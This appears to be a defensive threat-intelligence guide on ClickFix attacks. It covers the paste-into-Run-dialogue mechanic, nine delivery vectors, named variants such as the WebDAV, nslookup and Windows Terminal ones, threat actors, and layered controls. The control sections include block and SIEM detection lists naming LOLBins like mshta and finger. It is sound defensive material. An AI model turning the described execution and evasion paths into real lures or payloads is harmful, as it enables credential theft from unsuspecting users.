ClickFix in 2026: Trust-Flow Patterns, Named Variants, and What Stops Them

Updated April 2026 - The trust-flow patterns behind ClickFix, the variants and vectors carrying it, and the defences that work in 2026.

ClickFix is a social engineering attack that tricks users into running malicious commands on their own computers. It hides behind prompts that feel routine: a CAPTCHA verification, a browser error, a "click here to fix" button. The user thinks they are following a safety step, when they are in fact running the attack.

ClickFix is the most prominent example of what we call a trust-flow attack: an attack that disguises the malicious action inside a workflow the user trusts and expects to be safe. The category is wider than the technique. Fake tech support workflows, OAuth and SSO consent phishing, and mobile QR-code device-linking schemes all share the pattern. Trust-flow is offered as a useful shorthand for the pattern these attacks share.

The technique has crossed from emerging threat to mainstream initial access vector. Microsoft's 2025 Digital Defense Report places it at 47% of all observed initial compromises, ahead of traditional phishing at 35%. ESET measured 517% growth in H1 2025.

The Center for Internet Security tracked ClickFix as over a third of all non-malware Albert alerts against US public sector targets in H1 2025. Albert is CIS's network monitoring system deployed across US state and local government agencies. Recorded Future's Insikt Group, writing in March 2026, assesses ClickFix will very likely remain the dominant initial access vector throughout 2026.

Four independent measurement perspectives agree on the same trajectory. The technique now distributes through at least nine vectors, has spawned at least seven named variants, and is operated by everyone from criminal kit purchasers to nation-state groups including Kimsuky, MuddyWater, and APT28.

What Stops ClickFix

Short version, ahead of the full guide below: ClickFix is a technique problem, not a campaign problem. Detection rules tied to specific variants (RunMRU activity, Windows Terminal spawning PowerShell, WebDAV mappings) are necessary but not sufficient because new variants emerge monthly. The defences that hold across variants are three layers working together.

Layer one: block the execution path. Restrict PowerShell and script execution for non-administrative users through Group Policy or WDAC. This is the highest-impact single control. If the standard user cannot execute PowerShell, the most common ClickFix payload fails regardless of variant.

Layer two: train for trust-flow patterns. Generic phishing awareness does not address ClickFix because the attack reaches users through interactions they expect to be safe. Training has to teach pattern recognition (a verification step asking for a system action, an unprovoked browser warning offering a fix, a routine workflow with an unexpected step) rather than specific lures.

Layer three: detect the execution sequences. SIEM rules built around RunMRU activity, Windows Terminal spawning PowerShell, and clipboard-to-terminal patterns catch the execution itself rather than the lure that delivered it.

The full guide below expands each layer with implementation detail, the variants currently active, the vectors carrying them, and the trust-flow patterns the training needs to address.

How a ClickFix Attack Works

The core mechanic is quite simple and seems obvious now. Attackers convince users to copy and execute malicious commands through legitimate system tools.

Step 1: The fake prompt. You land on a webpage showing what looks like a CAPTCHA verification, a browser error, or a document rendering problem. Attackers clone real interfaces: Cloudflare Turnstile, Google reCAPTCHA, Microsoft authentication, and Okta login pages have all been replicated in ClickFix campaigns (Proofpoint, 2024; Unit 42, 2025).

Step 2: The clipboard hijack. When you interact with the fake prompt, malicious code is silently copied to your clipboard. The page's JavaScript has already staged the payload. Unit 42 describes this as "pastejacking" because the user is unknowingly pasting attacker-controlled commands (Palo Alto Networks, 2025).

Step 3: The execution. The prompt tells you to press Windows+R to open the Run dialogue, then Ctrl+V to paste, then Enter. That single sequence executes a PowerShell script, an mshta command (mshta.exe is a Windows utility for running HTML applications, frequently abused to execute scripts), or a cmd instruction that downloads malware directly into memory. The entire attack takes seconds.

macOS and Linux users face the same technique. On macOS, users have historically been directed to paste commands into Terminal. The April 2026 Script Editor variant documented by Jamf Threat Labs uses the applescript:// URL scheme instead, auto-opening Script Editor with a pre-loaded script that the user runs by clicking a button. ESET confirmed ClickFix affects all major operating systems (ESET, 2025).

The name "ClickFix" was coined by Proofpoint researchers in 2024, reflecting how attackers almost always include buttons labelled "Fix", "How to fix", or "Fix it." From 2010 to 2015, Microsoft's own "Fix it" solutions trained users to click automated repair prompts. Attackers exploit that conditioned behaviour.

How ClickFix Maps to MITRE ATT&CK

ClickFix sits across multiple ATT&CK techniques rather than under a single ID. MITRE added T1204.004 (Malicious Copy and Paste) specifically to capture the ClickFix copy-paste pattern and named the technique in the description. The execution chain extends well beyond that single sub-technique.

No single ClickFix campaign uses every technique below. Different variants and campaigns combine different techniques from this set. The table maps the full possibility space so defenders can match observed campaigns against the techniques most relevant to their environment.

A defender writing detection coverage for "ClickFix" needs to think across this table, not under one technique ID. Most existing ClickFix coverage references one or two of these techniques in passing. The full mapping matters because gaps in coverage on any row leave a working delivery path for attackers, even if no single attacker uses all rows in one campaign.

The Nine Distribution Vectors

ClickFix campaigns reach users through more than one channel. Treating it as an email problem misses most of the attack surface.

Vectors describe how the attack reaches the user. Variants describe how the attack executes once the user engages. The same campaign can combine any vector with any variant, and most use only one or two vectors at a time. The full list matters for defenders because the next campaign may use a completely different vector to the last one.

1. Email phishing

The original delivery method, still significant. The user receives an email with a link that leads to a ClickFix landing page, often after redirection through a traffic distribution system. Proofpoint's TA571 research documented the technique's emergence through this vector in 2024.

2. Compromised legitimate websites

Attackers inject JavaScript into legitimate sites they have breached. The injected code displays a fake CAPTCHA or verification prompt to visitors. Elastic Security documented this pattern in February 2026 on bincheck.io, a legitimate Bank Identification Number validation service that delivered the MIMICRAT payload through an injected Cloudflare verification page.

3. Malvertising

Malicious advertisements on streaming sites, pirated content sites, and other high-traffic destinations redirect users to ClickFix landing pages. Microsoft observed campaigns in April 2025 where free movie streaming pages funnelled tens to hundreds of thousands of users per day to ClickFix landing pages delivering Lumma Stealer.

4. Compromised browser extensions

Legitimate browser extensions taken over through ownership transfer or developer compromise. The new owner pushes an update that injects ClickFix prompts into the user's browsing experience. Bleeping Computer documented the QuickLens extension in February 2026, where version 5.8 disabled key browser security protections and weaponised the extension for both clipboard-based attacks and crypto wallet theft.

5. Search engine result poisoning

Attackers create or compromise pages that rank for "fix [error]" or "how to [problem]" search queries. Users searching for solutions to real technical problems land on ClickFix pages. Recorded Future's Insikt Group identified this pattern across multiple cluster operations in their March 2026 analysis.

6. Marketplace and brand impersonation

Campaigns clone the look and feel of trusted brands to deliver ClickFix through what appears to be a legitimate workflow. Palo Alto Unit 42 documented Storm-1865 impersonating Booking.com to target hospitality organisations. Recorded Future identified clusters impersonating QuickBooks (US tax season targeting), Birdeye, and Zillow real estate listings.

7. Social media DMs and verification scams

Attackers contact content creators and business page owners with offers of verification badges or warnings about account violations. Hunt.io and Cybersecurity News documented active campaigns through Facebook in January 2026 where users were instructed to copy authentication tokens during a fake verification process.

8. Job platforms and recruitment lures

Nation-state campaigns targeting job applicants in specific industries. Sekoia documented North Korean Lazarus Group activity expanding their "ClickFake Interview" campaign in February 2025, providing fake skill assessments to cryptocurrency company applicants that incorporated ClickFix.

9. Compromised software update prompts

Pages presenting fake software update notifications, often impersonating browser updates or codec installers. Microsoft documented campaigns involving SocGholish JavaScript payloads delivering fake browser update notifications that triggered ClickFix flows.

The defensive implication: an organisation that has solved email-borne ClickFix has solved one vector. Web filtering addresses two and three. Browser extension policy addresses four. Brand monitoring partially addresses six. Different campaigns weight these vectors differently, but no single control covers the full vector list. Defending against ClickFix requires layered controls because the attacker's delivery surface is wider than the defender's typical email-centric phishing programme.

The ClickFix Family: Named Variants

The previous section covered vectors (how the attack reaches the user). This section covers variants (how the attack executes once the user engages). A campaign's vector and variant choices are independent. Defenders need detection coverage for both axes.

The variants below have public technical reporting documenting their behaviour in the wild. Each shares the same social engineering pattern but differs in execution mechanism, target platform, or detection-evasion approach.

ClickFix (the original)

The base technique. Fake CAPTCHA or browser error prompt. Clipboard staging. User pastes into the Win+R Run dialogue (the small command box that opens when you press the Windows key and R together), presses Enter, the PowerShell payload executes. First named by Proofpoint researchers in 2024. Still the most prevalent variant.

CrashFix

Huntress identified CrashFix in January 2026. A malicious Chrome extension (typically introduced through the browser extension vector, including the documented NexShield extension impersonating uBlock Origin Lite) floods the browser with chrome.runtime port connections (a Chrome extension messaging mechanism, abused here to flood the browser until it crashes) until the browser becomes unresponsive. After force-close and restart, a fake security warning recommends a "scan" that leads to the standard ClickFix execution flow. The genuine browser crash makes the social engineering more convincing than a fake one. Delivers ModeloRAT and specifically targets corporate domain-joined machines.

DNS Staging Variant (nslookup-based)

Microsoft Threat Intelligence disclosed this variant in February 2026. It replaces the typical PowerShell download with a nslookup command that retrieves the next-stage payload through DNS responses. The choice of DNS as a covert delivery channel works because most organisations do not inspect DNS response payloads. The attack chain delivers ModeloRAT through a ZIP archive containing a portable Python interpreter, establishing persistence through Windows Startup folder shortcuts.

Windows Terminal Variant

The most operationally significant variant of 2026 to date. Microsoft Threat Intelligence disclosed it on 6 March 2026. It replaces Win+R with Win+X then I, which launches Windows Terminal (wt.exe) directly rather than the Run dialogue. This defeats detection rules built specifically around RunMRU activity (the Windows registry key that records every command typed into the Run dialogue). The payload uses commands encoded in hex and compressed with XOR, chained through multiple PowerShell processes to unpack and run. Delivers Lumma Stealer, which then hooks into Chrome and Edge browser processes through the QueueUserAPC() API to extract saved login credentials. A second infection path uses EtherHiding, a technique that hides command-and-control communications inside blockchain smart contract data.

Script Editor Variant (macOS)

Jamf Threat Labs documented this in April 2026, with secondary coverage in Malwarebytes and BleepingComputer. The variant sidesteps Terminal entirely by using the applescript:// URL scheme (a special URL format that, when clicked, opens Apple's Script Editor application with the link's content pre-loaded) to auto-open Script Editor with a pre-populated malicious script. The user clicks "Run" rather than copy-pasting. Lure: "Reclaim Disk Space on your Mac." Delivers Atomic Stealer. The variant emerged after Apple introduced Terminal paste protection in macOS Tahoe 26.4, demonstrating how attackers route around new defensive controls.

WebDAV Variant (net use)

Atos researchers identified this variant in March 2026. It replaces PowerShell download with a "net use" command that maps a WebDAV share (a file-sharing protocol built into Windows that lets a remote folder appear as a local drive) from an attacker-controlled server, then executes a hosted .cmd batch file through standard filesystem semantics. Bypasses EDR detection rules focused on PowerShell, mshta, and wscript by using native networking utilities. Successfully evaded Microsoft Defender for Endpoint in the documented case.

ClickFake Interview

A North Korean (Lazarus Group) campaign variant documented by Sekoia in February 2025. Uses fake job interview websites to deploy a Go-based backdoor called GolangGhost on both Windows and macOS, targeting non-technical employees in centralised finance and cryptocurrency companies (business development, marketing managers, asset managers). Sekoia assesses this is a continuation of Lazarus's earlier Contagious Interview campaign, with the ClickFix-style "fake camera driver fix" lure replacing earlier infection methods. Designed for credential and information theft to fund DPRK geopolitical objectives.

Other named variants and ongoing evolution

Public reporting also references FileFix, JackFix, ConsentFix, GlitchFix, TerminalFix, and DownloadFix. Technical depth on each varies across sources, with some appearing as one-line references in aggregator coverage and others with partial behavioural detail. The naming ecosystem is fluid: new variant names appear regularly, sometimes referring to genuinely distinct techniques and sometimes to minor operational variations on existing variants. Defenders should expect the variant list to keep growing.

What the variant family tells us

In our view, the strongest driver of variant emergence is evasion. Each new variant exists because attackers are routing around specific defensive controls that have started working. CrashFix exists because users became wary of unprovoked browser warnings (unexpected browser warnings that appear without the user doing anything obvious to trigger them).

The Windows Terminal variant exists because RunMRU detection improved. The Script Editor variant exists because Mac users learned not to paste into Terminal. The WebDAV variant exists because PowerShell detection improved.

The variants worth watching most closely are those that meaningfully expand the attack surface. Script Editor opens up macOS UI patterns beyond Terminal. WebDAV opens up native Windows networking utilities.

Why ClickFix Bypasses EDR and Email Security

After two decades working with security teams deploying endpoint protection, the reason ClickFix is so effective is not that defences are weak. The defences are working as designed. ClickFix bypasses them because of where the attack happens.

Two factors combine. First, the attack turns the user into the delivery mechanism. From an EDR perspective (endpoint detection and response, the security software running on company laptops and servers), ClickFix looks like a user launching powershell.exe from explorer.exe. No malicious file written to disk, no suspicious parent-child process chain, no exploit triggering a detection rule. The payload executes in memory through LOLBins (living-off-the-land binaries, legitimate Windows tools such as PowerShell, mshta, and finger that attackers reuse for malicious purposes), all of them already trusted by the operating system (Microsoft, 2025).

Second, the attack frames itself as a workflow the user trusts. This is the trust-flow pattern in action. The user is not asked to do something they recognise as risky. They are asked to verify themselves, fix an error, or complete a security check. The cognitive defences they have built around phishing emails (do not click links from strangers, do not open unexpected attachments) do not apply because this does not look like phishing. It looks like a security workflow they are familiar with.

Email security cannot resolve either factor. Email security scans attachments and URLs. ClickFix campaigns often contain only a clean URL that redirects through traffic distribution systems before landing on the attack page. Browser protections like Google Safe Browsing do not trigger because the browser is not downloading an executable. The user is.

Bitdefender noted that most malicious domains have already done their damage and been abandoned before any blocklist catches up (Bitdefender, 2025). Attackers spin up new domains faster than reputation services can flag them. Even if the domain reputation system worked perfectly, it would be addressing the wrong half of the problem because the technical execution is not the part the user fails at. The cognitive recognition is.

Where ClickFix Likely Goes From Here

ClickFix appears to have hit an attacker sweet spot: high success rate, low operational cost, broad target compatibility, and a defensive surface fragmented across email, web, training, endpoint, and identity controls. Public adoption metrics suggest this is sustained, not transient.

Microsoft has the technique at 47% of initial access, ESET measured 517% H1 2025 growth, and Recorded Future forecasts dominance through 2026. Roughly one new named variant has appeared in public reporting per month through 2026 H1.

The predictions below are grounded in observed patterns rather than speculation. Where confidence is high, we say so. Where the prediction is plausible but not yet observed, we say that too.

1. Variant velocity sustains or accelerates. Commercial kits ($200-$1,500 monthly per public reporting) reduce the cost of producing new variants. Each defensive improvement narrows one path, leaving the others intact. We expect a new named variant in public reporting roughly every 30-60 days through 2026, with the rate accelerating as more researchers focus on the technique.

2. Mobile is a wider question than it first appears, and partially answered already. The literal mobile-native ClickFix prediction, where users paste commands into a mobile shell, overstates the case. Mobile platforms lack the readily available command-line interfaces that desktop ClickFix exploits. Current ClickFix phishing kits actively block mobile users because the standard payloads do not execute. Palo Alto Unit 42's IUAM ClickFix Generator (active July-October 2025) explicitly filtered out mobile traffic.

The more useful observation is that the underlying social engineering pattern is already established on mobile, just not labelled as ClickFix. ESET's January 2026 GhostChat report documents the clearest bridge: the same threat actor running desktop ClickFix campaigns also operated a mobile QR-code WhatsApp device-linking operation, sharing infrastructure and lure framing across both sides.

The wider point: ClickFix has given attackers a model for shaping social engineering attacks. Traditional social engineering required convincing the user to take an unusual or risky action. ClickFix inverts that. The user is asked to do something that feels routine, helpful, or protective. Once attackers have a working pattern that frames the malicious action as a normal verification step, every flow with a similar shape becomes a potential variant.

An "IT support" Teams message walking you through a remote-access install after your inbox suddenly fills with subscription confirmations. An OAuth consent screen requesting permissions for what looks like a routine corporate app. Neither is technically ClickFix, but both share the structural ingredients: a context that feels safe, a request that feels routine, and a workflow that ends with the user having handed over what the attacker wanted.

We expect the framing of ClickFix to broaden through 2026 toward this wider trust-flow category. Mobile-specific named variants are possible but uncertain. The category expansion is more likely than the technical replication. Defenders should orient around the trust-flow pattern rather than wait for individual mobile-named variants.

3. AI-generated lures raise the social engineering quality bar. Current ClickFix lures rely on generic CAPTCHA, browser, and verification prompts. AI generation makes locally-relevant, well-localised, brand-accurate, and personalised lures dramatically cheaper to produce at scale. Expect cluster-specific campaigns (US tax season, hospitality, crypto) to shift from templated lures to AI-tuned ones through 2026.

4. Enterprise authentication flows become a primary target. OAuth consent screens, SSO challenges, MFA approval prompts, and SaaS verification flows all share the trust-flow pattern. Users have been trained to engage with these as security-positive interactions, which makes a ClickFix variant weaponising enterprise auth flow expectations particularly difficult to defend against. This is the prediction most worth tracking carefully because the cognitive defences users have built around enterprise auth flows are aligned with attacker goals.

5. Vertical-specific clusters proliferate. Recorded Future already identified clusters for US tax season (QuickBooks impersonation), hospitality (Booking.com), and crypto (ClickFake Interview). Expect documented clusters for healthcare, education, financial services, and real estate within the next two quarters. Each cluster will tend to use lures and brands native to that sector's normal workflow.

6. Detection regression as variants split. Defenders building per-variant detections face increasing maintenance burden. Organisations with strong PowerShell detection but no WebDAV detection will get hit by WebDAV variants. Organisations with strong RunMRU detection but no Windows Terminal coverage will get hit by Terminal variants. The detection arms race favours attackers in the short to medium term because evasion costs less than detection.

What this means for defenders

The implication for defenders is direct. ClickFix has become structural rather than incidental. Investment needs to shift from chasing individual variant signatures toward controls that work across the technique pattern.

This is where the trust-flow framing becomes operationally useful. Treating ClickFix as a single technique encourages defenders to write detections and training for ClickFix specifically. Treating ClickFix as one example of a wider trust-flow category encourages defenders to write detections and training for the underlying pattern: workflows where the user is induced to perform what they perceive as a security or verification step. That framing covers the existing ClickFix variants, the variants that have not yet been named, and the OAuth, SSO, and verification-flow attacks that are not technically ClickFix but exploit the same cognitive vulnerability.

Practically, this means following ClickFix research closely enough to spot new variants when they first appear, mapping observed campaigns against existing detection coverage to find gaps, and prioritising controls that work regardless of the specific execution mechanism. Script execution restriction for non-administrative users, behaviour-based detection of execution-interface sequences, DNS query inspection, and trust-flow-aware user training rather than generic phishing awareness.

The teams falling behind are those treating each variant as a new individual incident. The ones doing well are the ones who have already realised this is a single growing problem with multiple faces, and who are building the muscle to spot the next face faster than the attackers can name it.

Which Threat Actors Use ClickFix

ClickFix emerged in early 2024 from cybercriminal operations, first documented by Proofpoint in campaigns by the initial access broker TA571 and the ClearFake malware cluster (Proofpoint, 2024). Adoption was rapid.

Cybercriminal campaigns

Cybercriminal operators now deliver a wide range of payloads. Lumma Stealer is the most common final payload based on Microsoft's observations, responsible for 51% of infections. Other regularly delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, ModeloRAT, and the Amatera and Rhadamanthys infostealers (Microsoft, 2025). ClickFix builders are now sold commercially, providing weaponised landing pages ready to deploy (ESET, 2025). Underground markets sell ClickFix kits for $200 to $1,500 monthly, with customisable lures, VM detection bypass, and UAC evasion included (GBHackers).

Recorded Future Insikt Group cluster analysis (March 2026)

Insikt documented five distinct activity clusters with different operational patterns. Each cluster maintains its own lure themes, infrastructure, and target industries. The clusters are not attributed to specific named threat actors but represent coherent operational entities.

• QuickBooks cluster. Targets US tax season, active January 2026 onwards. Recently pivoted toward Zillow real estate marketplace users.
• Booking.com cluster (Storm-1865). Targets hospitality organisations across North America, Europe, and Asia.
• Birdeye cluster. Impersonates the Birdeye reputation management platform.
• Two additional clusters with distinct lure themes and infrastructure patterns.

Nation-state adoption

State-sponsored adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

• Kimsuky (North Korea) targeted think tanks researching North Korean policy, impersonating a Japanese diplomat to build trust before delivering QuasarRAT
• MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday
• APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
• UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

(Proofpoint, 2025)

When nation-state actors adopt a criminal technique this quickly, they are telling you it works against hardened targets. That is the part that should concern security teams more than the volume numbers.

Enterprise targeting

Enterprise targeting is accelerating. Unit 42 reported assisting in nearly a dozen incident response cases where ClickFix was the initial access vector, impacting organisations across technology, financial services, professional services, and manufacturing (Palo Alto Networks, 2025).

How to Defend Against ClickFix Attacks

No single control stops ClickFix. The defence works in layers, with technical controls reducing the attack surface and trust-flow awareness training addressing the parts technical controls cannot reach.

Three control layers matter: blocking the execution path on endpoints, training people to recognise trust-flow patterns, and detecting the execution patterns when they reach a SIEM. Each layer is described below. None of them is sufficient on its own.

How to Block ClickFix with Group Policy and WDAC

Restrict PowerShell and script execution for standard users through Group Policy or WDAC (Windows Defender Application Control, a Windows feature that restricts which applications and scripts can run on a system based on explicit allow rules). This is the highest-impact single control. If non-administrative users cannot execute PowerShell, the most common ClickFix payload fails. Class this as high priority, it helps across a lot of payload scenarios including new variants.

Block or monitor LOLBin abuse. Configure AppLocker or WDAC rules for mshta.exe, wscript.exe, cscript.exe, and finger.exe. Microsoft specifically recommended restricting outbound access for the finger utility (TCP port 79) after observing it abused in CrashFix campaigns (Microsoft Security Blog, 2026).

Enable PowerShell Script Block Logging. Non-negotiable. Without it, you have no forensic visibility into what ClickFix payloads executed. Enable Module Logging, Script Block Logging, and Transcription logging through Group Policy.

Monitor clipboard-to-terminal patterns. Alert on sequences of Win+R followed by PowerShell or cmd execution within short timeframes. This is anomalous for most business users.

Deploy DNS monitoring. The nslookup variant uses DNS as a staging channel. Monitor for nslookup commands executed from user-initiated processes targeting external DNS servers.

Review browser extension policies. After the NexShield and QuickLens incidents, restrict extension installation to approved lists where feasible. Monitor for extensions requesting unusual permissions like declarativeNetRequestWithHostAccess.

Block WebDAV egress where not required. The WebDAV variant relies on outbound connections to attacker-controlled SMB or WebDAV servers. Most enterprise networks do not require outbound SMB or WebDAV to arbitrary destinations and can block it at the firewall.

Trust-Flow Awareness Training for Employees

Technical controls reduce the attack surface. Training addresses the root cause.

Generic phishing awareness training is not sufficient for trust-flow attacks. Phishing training teaches people to be wary of unexpected emails from unknown senders. Trust-flow attacks specifically reach the user through interactions they expect to be safe: a CAPTCHA, a browser warning, a verification prompt, a routine workflow. The phishing-awareness instinct does not fire because the attack does not look like phishing.

What works is training that builds the habit of pausing when a familiar workflow takes an unusual turn. The cognitive prompt is "this feels routine, but does this part fit?"

Specific signals to teach:

• A CAPTCHA or verification step that asks you to perform a system action (open a Run box, paste a command, click a button in Script Editor) is not a CAPTCHA. CAPTCHAs verify you are human within the browser. They never extend outside it.
• A browser error that requires you to take action in another application is not a browser error. Real browser errors stay inside the browser.
• A "fix" or "scan" offered immediately after an unexpected event (a crash, a slowdown, a notification) is suspicious. Real fixes do not appear precisely when something else just went wrong.
• A verification flow that feels routine but asks for an action you have never been asked to perform before is worth pausing on. Routine workflows you genuinely trust have been seen many times. New steps in old workflows are red flags.
• Any request to copy and paste text into a system tool (Run dialogue, Terminal, Script Editor, command prompt) is high risk regardless of how the request is framed.

The broader principle is to train people to question the flow, not just the surface. Scammers can fake the surface convincingly. The flow is harder to fake because legitimate workflows have established shapes that users see repeatedly.

Microsoft recommends building specific playbooks for ClickFix rather than relying on generic phishing awareness (Microsoft MDDR, 2025). The attack is different enough from email phishing that existing training may not cover it.

How to Detect ClickFix in Your SIEM

For organisations running SIEM platforms, these detection opportunities have proven effective:

• Alert on PowerShell execution initiated from the Windows Run dialogue (explorer.exe > powershell.exe with specific command-line patterns)
• Monitor for encoded PowerShell commands (Base64 strings in command-line arguments)
• Flag HTTP requests with PowerShell user agents to external infrastructure
• Detect mshta.exe or finger.exe spawned from browser processes
• Monitor for SyncAppvPublishingServer.vbs execution, abused in recent campaigns to proxy PowerShell through a signed Microsoft component (Blackpoint, 2026)
• Alert on Windows Terminal (wt.exe) spawning PowerShell with encoded or hex-encoded command-line arguments, particularly when preceded by user-initiated Win+X keyboard shortcuts
• Monitor for "net use" commands mapping WebDAV or SMB shares from non-standard user contexts

Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules targeting ClickFix behaviour patterns. For ELK-based detection implementation, see our ELK Stack Security Monitoring Tutorial.

For broader threat actor context including groups documented running ClickFix campaigns, see our Threat Actor Tools Guide and the Scattered Spider attack chain analysis covering related social engineering tradecraft.

Building your security skills? Our Cybersecurity Skills Roadmap covers detection engineering fundamentals and career pathways. For the wider question of how AI is reshaping the SOC analyst role in light of techniques like ClickFix, see Will AI Replace SOC Analysts?.

Summary

ClickFix shifted attackers from breaking systems to convincing people. The user becomes the delivery mechanism. The attack succeeds because the cognitive defences users build against phishing do not apply to workflows they trust.

The trust-flow framing makes this technique easier to defend against, because it locates the problem correctly. ClickFix is one example of attackers disguising malicious actions inside trusted workflows. The defensive answer is not chasing each variant; it is building detection and training for the pattern itself.

Three controls matter most, and they work in layers. Restrict script execution for standard users. Train people to question the flow when a familiar workflow takes an unusual turn, not just to recognise specific tools or commands. Build detection rules for the execution patterns. If you have not done all three, you are exposed to the most common initial access technique currently observed.

For broader context, see our AI Security Threats guide and our breakdown of what infostealers are and how they work.

ClickFix campaigns evolve weekly. Subscribers get practical analysis when new variants emerge, plus weekly security insights. No sales pitches, no fluff.

ClickFix Glossary: Key Terms

For readers new to the technical terminology in this guide, the following definitions cover the terms most used throughout the article.

Albert. The Center for Internet Security's network-based intrusion detection system, deployed across US state and local government agencies. CIS publishes ClickFix-related Albert alert statistics that provide a public-sector-specific view of the technique's prevalence.

Clipboard hijack. The mechanism by which a webpage's JavaScript silently copies an attacker-controlled command to the user's clipboard, ready to be pasted into a system interface.

EDR (Endpoint Detection and Response). Security software that runs on laptops and servers to monitor activity and detect malicious behaviour. Most ClickFix variants are designed to bypass EDR by routing execution through legitimate user actions.

LOLBin (Living Off The Land Binary). A legitimate Windows tool that attackers reuse for malicious purposes. Examples include PowerShell, mshta.exe, finger.exe, and SyncAppvPublishingServer.vbs.

mshta.exe. A Windows utility for running HTML applications. Frequently abused as a script execution mechanism because it is signed by Microsoft and present by default on Windows systems.

RunMRU. A Windows registry key (HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) that records every command typed into the Run dialogue. Often the first place defenders look for evidence of ClickFix execution.

Script Block Logging (PowerShell). A Windows logging feature that records the content of every PowerShell script executed on a machine. Essential for ClickFix forensics. Disabled by default and enabled through Group Policy.

Trust-flow attack. A social engineering category in which attackers disguise the malicious action inside a workflow the user trusts and expects to be safe. Examples include CAPTCHA verification, browser error remediation, account verification, security checks, and login flows. ClickFix is the most prominent technique within the category in 2026, but trust-flow attacks are not limited to ClickFix. Fake tech support workflows, OAuth and SSO consent phishing, watering-hole-adjacent verification scams, and mobile QR-code device-linking schemes all share the structural pattern: a context that feels safe, a request that feels routine, and a workflow that ends with the user having performed the attacker's action. The term is offered as a useful shorthand for a pattern that is well-recognised but has not had a single shared label.

Trust-flow describes the human side of the attack, the workflow the user is induced to follow. MITRE ATT&CK describes the technical side, the specific commands and system interfaces the attack uses. Both are useful and they describe different things.

URL scheme handler. A registered relationship between a URL prefix (such as applescript://, ms-msdt:, or vscode://) and an application that opens when that prefix is invoked. Multiple ClickFix variants weaponise URL scheme handlers to invoke applications with attacker-controlled content.

WDAC (Windows Defender Application Control). A Windows feature that restricts which applications and scripts can run on a system based on explicit allow rules. The highest-impact single control against ClickFix on Windows when applied to PowerShell and script interpreters.

WebDAV. A file-sharing protocol built into Windows that lets a remote folder appear as a local drive. The 2026 WebDAV ClickFix variant abuses this to map an attacker-controlled remote share and execute a hosted batch file.

Win+R / Run Dialogue. The Windows command box that opens when a user presses the Windows key and R simultaneously. The original ClickFix variant's execution interface.

Win+X. A Windows shortcut that opens the Power User menu. The 2026 Windows Terminal ClickFix variant uses Win+X then I to launch Windows Terminal directly.

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering technique that tricks users into executing malicious commands on their own computers. Attackers use fake CAPTCHA prompts, browser errors, or document viewer problems to convince victims to open the Windows Run dialogue and paste a PowerShell command that has been silently copied to their clipboard. Microsoft identified ClickFix as the number one initial access method in 2025, responsible for 47% of observed attacks.

How does a ClickFix attack work?

The attack follows three steps. First, a fake prompt appears on a webpage claiming the user needs to verify their identity or fix a problem. Second, malicious code is silently copied to the user's clipboard through JavaScript on the page. Third, the user is instructed to press Windows+R, Ctrl+V, and Enter, which executes the hidden malicious command. The entire sequence takes seconds and bypasses most automated security controls because the user initiates the execution.

What is a trust-flow attack?

A trust-flow attack is a social engineering attack that disguises the malicious action inside a workflow the user trusts and expects to be safe. ClickFix is the most prominent example, but the category includes fake tech support workflows, OAuth and SSO consent phishing, and mobile QR-code device-linking schemes. The defining feature is that the user perceives the interaction as completing a security or verification step rather than as performing a risky action.

What malware does ClickFix deliver?

The most common payload is Lumma Stealer, responsible for 51% of observed infections (Microsoft, 2025). Other frequently delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, ModeloRAT, MIMICRAT, and Atomic Stealer (macOS). Recent campaigns have also delivered ransomware-enabling payloads.

Can ClickFix target Mac and Linux users?

Yes. ClickFix affects all major operating systems. macOS campaigns have historically directed users to paste commands into Terminal. The April 2026 Script Editor variant uses the applescript:// URL scheme to bypass Terminal entirely, auto-opening Script Editor with a pre-loaded malicious script that the user runs by clicking a button. Linux systems are also targeted through terminal-based command execution. ESET confirmed cross-platform targeting in their H1 2025 report.

What is CrashFix?

CrashFix is a ClickFix variant identified by Huntress in January 2026. It uses a malicious Chrome extension that deliberately crashes the browser, then displays a fake security warning offering to "fix" the problem. Unlike standard ClickFix which fakes errors, CrashFix creates a genuine browser crash, making the social engineering more convincing. It delivers ModeloRAT and specifically targets corporate domain-joined machines.

How do I protect my organisation against ClickFix?

The most effective defence combines three measures: restrict PowerShell and script execution for non-administrative users through Group Policy or WDAC, train employees to question the flow when a familiar workflow takes an unusual turn rather than just recognising specific tools, and deploy detection rules for ClickFix execution patterns. Microsoft recommends building ClickFix-specific response playbooks rather than relying on generic phishing training.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) targeting government, defence, and think tank organisations between late 2024 and early 2025. The rapid adoption by state-sponsored groups confirms the technique's effectiveness against security-aware targets.

Is ClickFix the same as phishing?

ClickFix is a form of social engineering but differs from traditional phishing. Phishing typically delivers malware through email attachments or malicious links that trigger automatic downloads. ClickFix requires the user to manually execute the command through a system tool like PowerShell or Terminal. Many email security controls that catch phishing do not detect ClickFix because the execution originates from a trusted user action.

References and Sources

1. Microsoft. (2025). 2025 Digital Defense Report. ClickFix identified as the number one initial access method, accounting for 47% of observed attacks by Defender Experts. Traditional phishing accounted for 35%.
2. ESET. (2025, June). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks. Confirmed ClickFix builders are sold commercially.
3. Microsoft. (2025, August). Think Before You Click(Fix): Analyzing the ClickFix social engineering technique. Microsoft Threat Intelligence's deep technical breakdown covering LOLBin abuse, fileless payload delivery, and detection patterns observed across thousands of monthly ClickFix incidents.
4. Proofpoint. (2024, June). From Clipboard to Compromise: A PowerShell Self-Pwn. Initial documentation of ClickFix emergence by TA571 and ClearFake cluster.
5. Proofpoint. (2024, November). ClickFix Social Engineering Technique Floods Threat Landscape. Documentation of expanded ClickFix activity beyond TA571.
6. Proofpoint. (2025, April). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by TA427 (Kimsuky), TA450 (MuddyWater), TA422 (APT28), and UNK_RemoteRogue.
